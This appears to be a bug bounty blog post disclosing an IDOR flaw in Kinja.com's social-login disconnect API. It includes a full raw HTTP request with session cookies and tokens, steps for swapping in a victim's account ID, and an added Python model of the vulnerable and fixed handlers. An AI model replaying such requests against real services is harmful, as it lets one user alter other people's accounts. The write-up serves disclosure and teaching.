KINJA.COM IDOR BUG WORTH 1000$


Kinja IDOR Poc – Bug Bounty POC

This post is published by Ruisilva as a contributor on Bug Bounty POC. Note that the post is written by Ruisilva, and any mistakes in the writing are his alone. We allow anyone to write content on our blog as a guest/contributor so that others can also learn. If you're interested in sharing your findings through the Bug Bounty POC platform, just sign up on the blog and you can post freely.

Hi, my name is Rui Silva and I found an IDOR vulnerability on Kinja.com.

Steps to reproduce:

First, this vulnerability only works if your account was logged in via the Connect to Facebook button.

This is the GET request for disconnecting any social media provider from your account; it looks like this:

GET /api/profile/account/<account_id>/disconnect?provider=google&token=d266cdf9-e76f-4c96-b95a-68a312f44e61-0-a1bc1efbbe7c1f353d44322cb4b6568343dfe81a&jsonp=jQuery211027393518528777927_1437691862794 HTTP/1.1
Host: kinja.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://kinja.com/settings
Cookie: ka=85c343a0-aec6-43ce-804f-5b1778512994|5334a9b2-808b-4648-9137-b143feea3d26|1437690908546; __k_iut=1436869611979; _cb_ls=1; _chartbeat2=CgfSMpl8BpelgLqd.1436869612907.1437691865015.1000000001; _ga=GA1.2.2138116728.1436869499; __qca=P0-673955367-1436869613038; cto_gawk=; fbm_36368793975=base_domain=.kinja.com; pageDepth=5; KinjaSession=228086f8-1572-4f89-9f67-b7c7215e15e6; fbsr_36368793975=NSp9fPMWHKe-4VcmDjw-kz2s2OeO9t-CCQIGPI8Jg2g.eyJhbGdvcml0aG0iOiJITUFDLVNIQTI1NiIsImNvZGUiOiJBUUJDX1ZyOUZibEZMY3d2cGd0TVliSVVQWEYwRUdIY0dYdjdzMXBOLUVGZG54MmRqQjVEd3ctbmdSQl9TSy1HTUFFY0hLTG1va21Ub2R4OWZtVHJzTnFRUDU4TnpHekM3SzdvQW1kU1MwSjR2UUZNWTkwSmo3ZHJXVTNHVmlzZWRXNmMzQXZhQlNqY2oxVUxONXZqS3lPNVd2UVcycnVTX3VmVFZoYm1SdVU5MXd6NFM1VHBRemwxOWZlN1F3cHdhY2d6aEd5ejI2aHpaSnVRbGF3ZlM4OWo3ZW5UclFiNE9rY3YzbUNPd1hwem9tWXRKZ2hlZjN6Y29NZ05PRDJQY0o4WndvTTZGVDdWZ0VZaG8wZnBnTG0tcmVfWG03VEpsbkdrYVBzdTBEQVhXMlBwTTk0RE0tUU9jOFlWQ3h2anE0bXNQbUNwZld3bThGQmZERUN3RG9xLSIsImlzc3VlZF9hdCI6MTQzNzY4OTE0NCwidXNlcl9pZCI6IjE2MTg0MjUwNjUxMTI1MTIifQ; geocc=PT; KinjaRememberMe=5876237249235904615|228086f8-1572-4f89-9f67-b7c7215e15e6; kinjaads.displayName=Silva; kinjaads.isBurner=false; _gat=1; KinjaToken=d266cdf9-e76f-4c96-b95a-68a312f44e61-0-a1bc1efbbe7c1f353d44322cb4b6568343dfe81a
Connection: keep-alive

It was observed that by simply changing the value of <account_id> in the above URL, you can disconnect any of the victim account's social media connections.

If the account was logged in with Facebook, I can disconnect the victim from Twitter and Google.
If the account was logged in with Twitter, I can disconnect the victim from Facebook and Google.
If the account was logged in with Google, I can disconnect the victim from Twitter and Facebook.

All you have to do is change the victim's ID in the request above and, in the provider= parameter, set any social network the victim is connected to.
Thanks

IMPACT:

I can disconnect any account that was logged in via the Connect to Facebook function.
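The root cause described above is that the server trusts the <account_id> in the URL and only verifies that the caller holds a valid session, never that the session belongs to that account. The following is an added illustration, not Kinja's code: a minimal model of such a disconnect handler in its vulnerable form next to the hardened form, where the target account must match the authenticated session and a mismatch is refused (and is the event a defender would log and alert on). All account IDs, tokens and provider names are constructed for the demo.

```python
# Added example (not Kinja's code): model of the /disconnect handler.
# Vulnerable version: any valid session can modify any account_id (IDOR).
# Hardened version: account_id must equal the session's own account.
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised when the caller may not act on the target account."""


@dataclass
class Account:
    account_id: int
    providers: set = field(default_factory=set)  # linked social logins


@dataclass
class Session:
    token: str
    account_id: int  # the account this session was authenticated as


# Constructed sample data: account 1 is the caller, account 2 is someone else.
SESSIONS = {"tok-caller": Session("tok-caller", 1)}


def make_accounts() -> dict:
    """Fresh copy of the constructed account store for each scenario."""
    return {
        1: Account(1, {"facebook"}),
        2: Account(2, {"facebook", "twitter", "google"}),
    }


def authenticate(token: str) -> Session:
    """Resolve the token to a session; unknown tokens are rejected."""
    try:
        return SESSIONS[token]
    except KeyError:
        raise Forbidden("invalid token")


def disconnect_vulnerable(accounts: dict, account_id: int,
                          provider: str, token: str) -> set:
    """IDOR: proves *a* session exists, then trusts account_id from the URL."""
    authenticate(token)
    account = accounts[account_id]
    account.providers.discard(provider)
    return account.providers


def disconnect_hardened(accounts: dict, account_id: int,
                        provider: str, token: str) -> set:
    """Fix: the target account must be the one the session belongs to."""
    session = authenticate(token)
    if session.account_id != account_id:
        # This mismatch is exactly the cross-account attempt pattern worth
        # logging: session owner vs. requested object differ.
        raise Forbidden(f"session for account {session.account_id} "
                        f"tried to modify account {account_id}")
    account = accounts[account_id]
    account.providers.discard(provider)
    return account.providers


def attempt_cross_account(handler) -> str:
    """Run the caller's session against account 2; report what happened."""
    accounts = make_accounts()
    try:
        handler(accounts, 2, "twitter", "tok-caller")
    except Forbidden:
        return "refused"
    return "modified" if "twitter" not in accounts[2].providers else "unchanged"


if __name__ == "__main__":
    print("vulnerable:", attempt_cross_account(disconnect_vulnerable))
    print("hardened:  ", attempt_cross_account(disconnect_hardened))
```

A stricter variant of the fix ignores the URL's account ID entirely and derives the target account from the session; keeping the explicit comparison, as above, has the advantage of producing a loggable mismatch event.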

Thanks


2 Responses

  1. Gaylord Ende says:

    I think this web site contains some rattling wonderful info for everyone :D. "Time, our youth, it never really goes, does it? It is all held in our minds." by Helen Hoover Santmyer.

  2. mr r says:

    But could you guess the victim ID?
